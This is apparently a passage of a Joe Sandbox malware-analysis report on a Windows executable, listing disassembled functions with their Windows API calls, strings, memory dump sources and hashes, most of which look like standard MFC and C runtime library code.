                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                  • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                  • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                  • Instruction Fuzzy Hash:
                                                                  Function 0042A305 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44registrywindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegisterWindowMessageA.USER32(Native), ref: 0042A314
                                                                  • RegisterWindowMessageA.USER32(OwnerLink), ref: 0042A31D
                                                                  • RegisterWindowMessageA.USER32(ObjectLink), ref: 0042A327
                                                                  • RegisterWindowMessageA.USER32(Embedded Object), ref: 0042A331
                                                                  • RegisterWindowMessageA.USER32(Embed Source), ref: 0042A33B
                                                                  • RegisterWindowMessageA.USER32(Link Source), ref: 0042A345
                                                                  • RegisterWindowMessageA.USER32(Object Descriptor), ref: 0042A34F
                                                                  • RegisterWindowMessageA.USER32(Link Source Descriptor), ref: 0042A359
                                                                  • RegisterWindowMessageA.USER32(FileName), ref: 0042A363
                                                                  • RegisterWindowMessageA.USER32(FileNameW), ref: 0042A36D
                                                                  • RegisterWindowMessageA.USER32(Rich Text Format), ref: 0042A377
                                                                  • RegisterWindowMessageA.USER32(RichEdit Text and Objects), ref: 0042A381
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: MessageRegisterWindow
                                                                  • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                  • API String ID: 1814269913-2889995556
                                                                  • Opcode ID: b09424a890d9c2d964cd6ab38d7185a386422683ead705cd42c27e26f868f6a1
                                                                  • Instruction ID: fc5418e7bedd38ffc0e11e4f4bc2214e5acc9818e2d4631a821a168c411807f2
                                                                  • Opcode Fuzzy Hash: b09424a890d9c2d964cd6ab38d7185a386422683ead705cd42c27e26f868f6a1
                                                                  • Instruction Fuzzy Hash: 8E018C70A407845ACB30BFB69C09D4BBEE0EEC9B107615E6FE495A7660D6BCD001CF48
                                                                  Function 00427FF6 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 167registrylibraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00428019
                                                                  • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00428024
                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 00428055
                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 0042805D
                                                                  • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0042806A
                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 00428084
                                                                  • ConvertDefaultLocale.KERNEL32(000003FF), ref: 0042808A
                                                                  • GetVersion.KERNEL32 ref: 00428098
                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 004280BD
                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 004280E3
                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 0042812F
                                                                  • ConvertDefaultLocale.KERNEL32(76230A60), ref: 00428135
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00428140
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ConvertDefaultLocale$AddressProc$CloseHandleModuleOpenQueryValueVersion
                                                                  • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                  • API String ID: 780041395-483790700
                                                                  • Opcode ID: 978b5882cf4835e7424ef31a4d6838547d496389b0aa7b075c70622b72c37f28
                                                                  • Instruction ID: 2dc31b13f6de58c0e78e48cd1bee0818dccec789095d0f28fd6a06ab5592f720
                                                                  • Opcode Fuzzy Hash: 978b5882cf4835e7424ef31a4d6838547d496389b0aa7b075c70622b72c37f28
                                                                  • Instruction Fuzzy Hash: A5514B71F40229AFDF109FE6DC85ABEBAB8EB48354F54043BF501E3290DA7C59419B68
                                                                  Function 00422E50 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 167stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00429CA6: __EH_prolog.LIBCMT ref: 00429CAB
                                                                  • CallNextHookEx.USER32(?,00000003,?,?), ref: 00422E85
                                                                  • GetClassLongA.USER32(?,000000E6), ref: 00422ECA
                                                                  • GlobalGetAtomNameA.KERNEL32(?,?,00000005), ref: 00422EF6
                                                                  • lstrcmpiA.KERNEL32(?,ime), ref: 00422F05
                                                                  • SetWindowLongA.USER32(?,000000FC,Function_0002242E), ref: 00422F3F
                                                                  • CallNextHookEx.USER32(?,00000003,?,?), ref: 00423043
                                                                  • UnhookWindowsHookEx.USER32(?), ref: 00423054
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Hook$CallLongNext$AtomClassGlobalH_prologNameUnhookWindowWindowslstrcmpi
                                                                  • String ID: #32768$AfxOldWndProc423$ime
                                                                  • API String ID: 3204395069-4034971020
                                                                  • Opcode ID: 2e54a2d68c0ca1e145083fe81b64065eb11ebc909a731c844331e9d10c2e6431
                                                                  • Instruction ID: a72a045e4e3713aab608079d00397e783e2f759094d70b61f3d5639fb80dd1df
                                                                  • Opcode Fuzzy Hash: 2e54a2d68c0ca1e145083fe81b64065eb11ebc909a731c844331e9d10c2e6431
                                                                  • Instruction Fuzzy Hash: 6951C331700124BBDF219F61ED48B9E7BB4AF18361F908166F814A62A1C778DE45DBAC
                                                                  Function 00404FF2 Relevance: 29.8, APIs: 8, Strings: 9, Instructions: 78libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(USER32,?,?,?,00405143), ref: 0040501B
                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00405037
                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00405048
                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00405059
                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 0040506A
                                                                  • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 0040507B
                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0040508C
                                                                  • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 0040509D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32$`#vp,$v
                                                                  • API String ID: 667068680-2614843311
                                                                  • Opcode ID: 5547913a3e14e16a07a1123cd0d9303ef4187e5ce9ad497fcc0af7a3a5c74f0c
                                                                  • Instruction ID: a51757c319cfb8603869d02164866bf9d90346e9d9b4ab7557ddca89ad350173
                                                                  • Opcode Fuzzy Hash: 5547913a3e14e16a07a1123cd0d9303ef4187e5ce9ad497fcc0af7a3a5c74f0c
                                                                  • Instruction Fuzzy Hash: AD215E74A026179AE321AF27BDC452EBAF4F6487403E4543FD404E22D0D73954868F9E
                                                                  Function 00412421 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 115fileCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 004124A2
                                                                  • _strcat.LIBCMT ref: 004124B5
                                                                  • _strlen.LIBCMT ref: 004124C2
                                                                  • _strlen.LIBCMT ref: 004124D1
                                                                  • _strncpy.LIBCMT ref: 004124E8
                                                                  • _strlen.LIBCMT ref: 004124F1
                                                                  • _strlen.LIBCMT ref: 004124FE
                                                                  • _strcat.LIBCMT ref: 0041251C
                                                                  • _strlen.LIBCMT ref: 00412564
                                                                  • GetStdHandle.KERNEL32(000000F4,00431F70,00000000,?,00000000,00000000,00000000,00000000), ref: 0041256F
                                                                  • WriteFile.KERNEL32(00000000), ref: 00412576
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: _strlen$File_strcat$HandleModuleNameWrite_strncpy
                                                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                  • API String ID: 3601721357-4022980321
                                                                  • Opcode ID: 33eba8a56c94104930c01ea856345e6cd8f8d6e67629feebce46de6d582aadf8
                                                                  • Instruction ID: 13021548b91ef27835def0d839a72f5b902c9013898fcf24966e2a0fbd176725
                                                                  • Opcode Fuzzy Hash: 33eba8a56c94104930c01ea856345e6cd8f8d6e67629feebce46de6d582aadf8
                                                                  • Instruction Fuzzy Hash: 1B317B72640114ABDB24ABB9DCC1FEB3369EB44318F10082FF555E3192DE7CA4A5872C
                                                                  Function 00412E75 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 97COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,004321C0,00000118,0040EA00,00000001,00000000,00431A80,00000008,0041258D,00000000,00000000,00000000), ref: 00412EF6
                                                                  • _strcat.LIBCMT ref: 00412F0C
                                                                  • _strlen.LIBCMT ref: 00412F1C
                                                                  • _strlen.LIBCMT ref: 00412F2D
                                                                  • _strncpy.LIBCMT ref: 00412F47
                                                                  • _strlen.LIBCMT ref: 00412F50
                                                                  • _strcat.LIBCMT ref: 00412F6C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: _strlen$_strcat$FileModuleName_strncpy
                                                                  • String ID: ( C$...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                                                  • API String ID: 3058806289-1906809315
                                                                  • Opcode ID: 54b1497dfd563ac8debf3ed2c16c48730149fe1c51b89dfeef04513612d6689f
                                                                  • Instruction ID: dc0b60b2e2fa07aa48be410cc1825f31972f92912820f319277543dbe6ba90b6
                                                                  • Opcode Fuzzy Hash: 54b1497dfd563ac8debf3ed2c16c48730149fe1c51b89dfeef04513612d6689f
                                                                  • Instruction Fuzzy Hash: 2931EC719012146BDB11AB61AD82ECE3668DF0A324F10046FF114F72D2DBBCDA954BAD
                                                                  Function 00411F5D Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 71libraryloadermemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,76230A60,00000000,0040E8F2,?,00431A70,00000060), ref: 00411F75
                                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00411F8D
                                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00411F9A
                                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00411FA7
                                                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00411FB4
                                                                  • FlsAlloc.KERNEL32(00411E16,?,00431A70,00000060), ref: 00411FF1
                                                                  • FlsSetValue.KERNEL32(00000000,?,00431A70,00000060), ref: 0041201E
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00412032
                                                                    • Part of subcall function 00411D88: FlsFree.KERNEL32(00000006,00412047,?,00431A70,00000060), ref: 00411D93
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$AllocCurrentFreeHandleModuleThreadValue
                                                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$`#vp,$v$kernel32.dll
                                                                  • API String ID: 2355849793-3083462466
                                                                  • Opcode ID: 87445edb743fa6b159021db6ff6499874027bb5d5b45ed15fee1da4cd6f863fa
                                                                  • Instruction ID: 94756841155c4855af9acbccb37cf424809e5c19bd57a04feacf727f30d0ec92
                                                                  • Opcode Fuzzy Hash: 87445edb743fa6b159021db6ff6499874027bb5d5b45ed15fee1da4cd6f863fa
                                                                  • Instruction Fuzzy Hash: 8E219270E01B109BD7209F36AC0AE567EE4EB94761710523BF400C22B0EB789887CF5C
                                                                  Function 0040D23B Relevance: 22.9, APIs: 15, Instructions: 359windowkeyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0040D240
                                                                  • GetFocus.USER32 ref: 0040D269
                                                                  • GetParent.USER32(?), ref: 0040D2BE
                                                                  • GetParent.USER32(?), ref: 0040D2CE
                                                                  • GetKeyState.USER32(00000012), ref: 0040D386
                                                                  • IsDialogMessageA.USER32(?,?,?,?,?,00000000), ref: 0040D435
                                                                  • GetFocus.USER32 ref: 0040D447
                                                                  • GetFocus.USER32 ref: 0040D454
                                                                    • Part of subcall function 004043DD: GetNextDlgTabItem.USER32(?,?,?), ref: 004043F0
                                                                  • IsWindow.USER32(?), ref: 0040D46C
                                                                  • GetFocus.USER32 ref: 0040D478
                                                                  • IsWindow.USER32(?), ref: 0040D48E
                                                                  • GetFocus.USER32 ref: 0040D494
                                                                  • GetKeyState.USER32(00000010), ref: 0040D4C5
                                                                  • MessageBeep.USER32(00000000), ref: 0040D5BC
                                                                  • SendMessageA.USER32(?,000000F1,00000001,00000000), ref: 0040D6A3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Focus$Message$ParentStateWindow$BeepDialogH_prologItemNextSend
                                                                  • String ID:
                                                                  • API String ID: 2999224188-0
                                                                  • Opcode ID: 3f0161c52a8131cff4d874affb24284938a97bd9b6013c2c61ed968d9b0ac3a0
                                                                  • Instruction ID: 35367725a961e0762c2cabb331062711e07683ca912c259f6d9a903d8a3fc05f
                                                                  • Opcode Fuzzy Hash: 3f0161c52a8131cff4d874affb24284938a97bd9b6013c2c61ed968d9b0ac3a0
                                                                  • Instruction Fuzzy Hash: 07C19030E002159BDF20AFA5C885ABFBBB5AF54354F54443BE805B72D1C73DAC89CA5A
                                                                  Function 00416BA3 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 90libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(user32.dll,00431FC0,?,?), ref: 00416BBB
                                                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00416BD7
                                                                  • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00416BE8
                                                                  • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00416BF5
                                                                  • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 00416C0B
                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00416C1C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
                                                                  • API String ID: 2238633743-1612076079
                                                                  • Opcode ID: 9e327152f9d207da8eb992561a812df92acea30e061754a633c313ec85e84a5e
                                                                  • Instruction ID: 84e52e513d7d4be0df6fc3aa4f30dfd75f48eeac0b79a234e46bab85f2138aa6
                                                                  • Opcode Fuzzy Hash: 9e327152f9d207da8eb992561a812df92acea30e061754a633c313ec85e84a5e
                                                                  • Instruction Fuzzy Hash: CA21A7B1A00306ABDB249F659E85FBB3BECDB48740B15103AE945C2250F778D984D7AD
                                                                  Function 0042B969 Relevance: 19.9, APIs: 13, Instructions: 395stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0042B96E
                                                                  • lstrlenA.KERNEL32(?,?,?), ref: 0042B9A8
                                                                  • VariantClear.OLEAUT32(?), ref: 0042BC3B
                                                                  • VariantClear.OLEAUT32(?), ref: 0042BC62
                                                                  • SysFreeString.OLEAUT32(?), ref: 0042BCC6
                                                                  • SysFreeString.OLEAUT32(?), ref: 0042BCDB
                                                                  • SysFreeString.OLEAUT32(?), ref: 0042BCF0
                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 0042BD28
                                                                  • VariantClear.OLEAUT32(?), ref: 0042BD38
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearFreeString$ChangeH_prologTypelstrlen
                                                                  • String ID:
                                                                  • API String ID: 344392101-0
                                                                  • Opcode ID: 089186b2475cb69903ae3bdd73d4d94893396a00b302e6d1bc5308c4256f1ad2
                                                                  • Instruction ID: 7c280d155deaacb0d062ce9fde7c5bc633f2178c496f6d30549a061dd8c1b599
                                                                  • Opcode Fuzzy Hash: 089186b2475cb69903ae3bdd73d4d94893396a00b302e6d1bc5308c4256f1ad2
                                                                  • Instruction Fuzzy Hash: 59E1AE71A00219DFDF10DFA9E880AEEBBB5FF05300F54442AE951A7250D738AD52CFA9
                                                                  Function 0042166B Relevance: 19.7, APIs: 13, Instructions: 174windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00423CEB: GetWindowLongA.USER32(?,000000F0), ref: 00423CF6
                                                                  • GetParent.USER32(?), ref: 00421696
                                                                  • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 004216B9
                                                                  • GetWindowRect.USER32(?,?), ref: 004216D2
                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 004216E5
                                                                  • CopyRect.USER32(?,?), ref: 00421732
                                                                  • CopyRect.USER32(?,?), ref: 0042173C
                                                                  • GetWindowRect.USER32(00000000,?), ref: 00421745
                                                                  • CopyRect.USER32(?,?), ref: 00421761
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                  • String ID:
                                                                  • API String ID: 808654186-0
                                                                  • Opcode ID: 543d3be195253b833f47fdbe98b0e5ceab59b1d8d68aa360d95ee6028cc7d4e0
                                                                  • Instruction ID: ef626137246b3df9443168ea5854a1867bc10e0d27b41f31f247ff74b2751243
                                                                  • Opcode Fuzzy Hash: 543d3be195253b833f47fdbe98b0e5ceab59b1d8d68aa360d95ee6028cc7d4e0
                                                                  • Instruction Fuzzy Hash: CB518471B00219AFDB10DBA9DD85FEEBBB9AF94314F590126F501F3290D638E9068B58
                                                                  Function 00415212 Relevance: 16.8, APIs: 11, Instructions: 299COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LCMapStringW.KERNEL32(00000000,00000100,004322C4,00000001,00000000,00000000,004322C8,00000038,0040FB6E,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 00415239
                                                                  • GetLastError.KERNEL32 ref: 0041524B
                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,0040FE1B,?,00000000,00000000,004322C8,00000038,0040FB6E,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 004152D2
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,0040FE1B,?,?,00000000), ref: 00415353
                                                                  • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0041536D
                                                                  • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 004153A8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: String$ByteCharMultiWide$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1775797328-0
                                                                  • Opcode ID: 144a4794a36e381682c1608e6ad5055cd70a4332a4d33170656413dfc46b285a
                                                                  • Instruction ID: 5d6a1a971d9631bc273ea7c0213d5fa4ae4f756ba9487c2342617ad8996632df
                                                                  • Opcode Fuzzy Hash: 144a4794a36e381682c1608e6ad5055cd70a4332a4d33170656413dfc46b285a
